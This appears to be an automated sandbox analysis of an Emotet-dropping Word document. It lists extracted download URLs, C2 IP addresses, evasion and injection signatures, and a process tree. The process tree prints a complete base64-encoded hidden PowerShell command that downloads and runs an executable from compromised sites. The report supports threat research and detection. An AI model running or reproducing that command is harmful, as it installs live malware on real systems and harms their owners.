Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
16-12-2019 11:41
General
Malware Config
Extracted
http://helloseatravel.com/wp-content/EFtavrYg/
http://goldonam.com/wp-admin/uv/
http://mattonicomunicacao.com/agenciamento/ekuia/
http://myagentco.com/new/vkn/
https://usa.slackart.ch/wp-content/TxDVHvMRu8/
Extracted
emotet
85.152.174.56:80
59.148.227.190:80
5.154.58.24:80
46.105.131.87:80
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
211.63.71.72:8080
47.6.15.79:80
201.173.217.124:443
98.24.231.64:80
201.251.133.92:443
116.48.142.21:443
74.105.102.97:8080
58.171.42.66:8080
169.239.182.217:8080
149.202.153.252:8080
91.73.197.90:80
186.75.241.230:80
73.214.99.25:80
87.106.136.232:8080
59.103.164.174:80
83.136.245.190:8080
206.189.112.148:8080
45.33.49.124:443
190.12.119.180:443
144.139.247.220:80
91.205.215.66:8080
37.157.194.134:443
206.81.10.215:8080
212.129.24.79:8080
190.147.215.53:22
81.0.63.86:8080
31.172.240.91:8080
165.228.24.197:80
93.147.141.5:80
70.46.247.81:80
107.170.24.125:8080
167.99.105.223:7080
192.241.255.77:8080
5.88.182.250:80
128.65.154.183:443
139.130.241.252:443
85.72.180.68:80
186.67.208.78:8080
104.131.44.150:8080
70.175.171.251:80
165.227.156.155:443
120.150.246.241:80
110.142.38.16:80
103.86.49.11:8080
2.235.190.23:8080
104.131.11.150:8080
108.191.2.72:80
68.118.26.116:80
2.38.99.79:80
209.97.168.52:8080
101.187.247.29:80
182.176.132.213:8090
87.106.139.101:8080
95.128.43.213:8080
190.220.19.82:443
5.196.74.210:8080
110.143.57.109:80
104.236.246.93:8080
183.102.238.69:465
87.230.19.21:8080
159.65.25.128:8080
179.13.185.19:80
50.116.86.205:8080
86.98.156.239:443
73.11.153.178:8080
73.176.241.255:80
31.131.182.30:80
61.197.110.214:80
212.64.171.206:80
188.152.7.140:80
190.53.135.159:21
47.156.70.145:80
2.237.76.249:80
176.31.200.130:8080
64.147.15.138:80
31.31.77.83:443
80.21.182.46:80
189.209.217.49:80
209.141.54.221:8080
200.7.243.108:443
218.44.21.114:80
190.226.44.20:21
12.176.19.218:80
176.106.183.253:8080
100.14.117.137:80
47.6.15.79:443
92.222.216.44:8080
167.71.10.37:8080
1.33.230.137:80
75.80.148.244:80
210.6.85.121:80
181.57.193.14:80
173.91.11.142:80
217.160.182.191:8080
78.24.219.147:8080
138.59.177.106:443
64.53.242.181:8080
45.51.40.140:80
62.75.187.192:8080
82.155.161.203:80
178.210.51.222:8080
195.244.215.206:80
110.143.84.202:80
67.225.179.64:8080
201.184.105.242:443
197.254.221.174:80
178.209.71.63:8080
101.187.134.207:443
66.76.63.99:80
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4624 78.exe 4664 78.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4904 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4904 WINWORD.EXE 4624 78.exe 4664 78.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1000 wrote to memory of 2900 1000 SppExtComObj.exe 76 PID 4472 wrote to memory of 4624 4472 Powershell.exe 80 PID 4624 wrote to memory of 4664 4624 78.exe 81 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4472 Powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4904 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4472 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4664 78.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8b609fd8a3fa8035a22468460e491f21ffa438e527463173a2403dc4097640d9.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4904
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABVAHAAcQB0AHgAZQBuAHAAcwBjAHcAPQAnAEsAbgBzAHEAcQBkAGcAdwAnADsAJABPAHMAcQBlAG0AbQB4AHYAIAA9ACAAJwA3ADgAJwA7ACQATwBoAGYAYwBzAHYAaQBmAHEAcQB0AD0AJwBBAG4AaQB2AGkAcgBiAGkAbwBzACcAOwAkAE8AZQB6AHUAbABuAGkAeABrAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAHMAcQBlAG0AbQB4AHYAKwAnAC4AZQB4AGUAJwA7ACQAVQB2AGcAcwBkAHIAcwBuAGMAZgBxAD0AJwBXAHgAdQBxAGoAawBxAHkAagBxACcAOwAkAFkAaQBnAHcAaQB3AHkAYgB1AHUAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBFAGIAYwBMAGkARQBOAHQAOwAkAFgAegBmAHkAcwByAGsAYgBxAG8APQAnAGgAdAB0AHAAOgAvAC8AaABlAGwAbABvAHMAZQBhAHQAcgBhAHYAZQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARQBGAHQAYQB2AHIAWQBnAC8AKgBoAHQAdABwADoALwAvAGcAbwBsAGQAbwBuAGEAbQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQB2AC8AKgBoAHQAdABwADoALwAvAG0AYQB0AHQAbwBuAGkAYwBvAG0AdQBuAGkAYwBhAGMAYQBvAC4AYwBvAG0ALwBhAGcAZQBuAGMAaQBhAG0AZQBuAHQAbwAvAGUAawB1AGkAYQAvACoAaAB0AHQAcAA6AC8ALwBtAHkAYQBnAGUAbgB0AGMAbwAuAGMAbwBtAC8AbgBlAHcALwB2AGsAbgAvACoAaAB0AHQAcABzADoALwAvAHUAcwBhAC4AcwBsAGEAYwBrAGEAcgB0AC4AYwBoAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFQAeABEAFYASAB2AE0AUgB1ADgALwAnAC4AIgBzAGAAUABsAEkAdAAiACgAJwAqACcAKQA7ACQASwBuAGsAYQBmAHoAcAB6AGwAeQB6AGIAPQAnAFoAYgBiAGcAdgB4AGoAbABtAHQAaAAnADsAZgBvAHIAZQBhAGMAaAAoACQARwBzAGQAYQB3AGgAZgBoAGYAYgAgAGkAbgAgACQAWAB6AGYAeQBzAHIAawBiAHEAbwApAHsAdAByAHkAewAkAFkAaQBnAHcAaQB3AHkAYgB1AHUALgAiAGQAbwB3AG4ATABvAGAAQQBkAGAARgBgAGkAbABFACIAKAAkAEcAcwBkAGEAdwBoAGYAaABmAGIALAAgACQATwBlAHoAdQBsAG4AaQB4AGsAKQA7ACQASQBxAHMAbABmAGQAeABzAGQAPQAnAFcAZgBhAHoAeQB5AHgAcwBkAHcAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABPAGUAegB1AGwAbgBpAHgAawApAC4AIgBMAGAARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADEANwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAUgB0ACIAKAAkAE8AZQB6AHUAbABuAGkAeABrACkAOwAkAEMAdQBnAGsAegBiAHEAdABvAHUAaABqAHMAPQAnAFkAcAB1AHYAdABwAGoAcQB3AGsAbQBuACcAOwBiAHIAZQBhAGsAOwAkAE4AaQB4AGIAdwBqAGsAdwBtAHQAYwA9ACcASQBrAHMAcQBmAGwAZAB0AG4AYwBvAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQBqAGEAbgBuAHUAZQBhAG0AawBoAHcAPQAnAEMAYwBhAHQAYwB3AGIAZgBlAHUAJwA=1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4472 -
C:\Users\Admin\78.exe"C:\Users\Admin\78.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\78.exe--a87aaf2b3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4664
-
-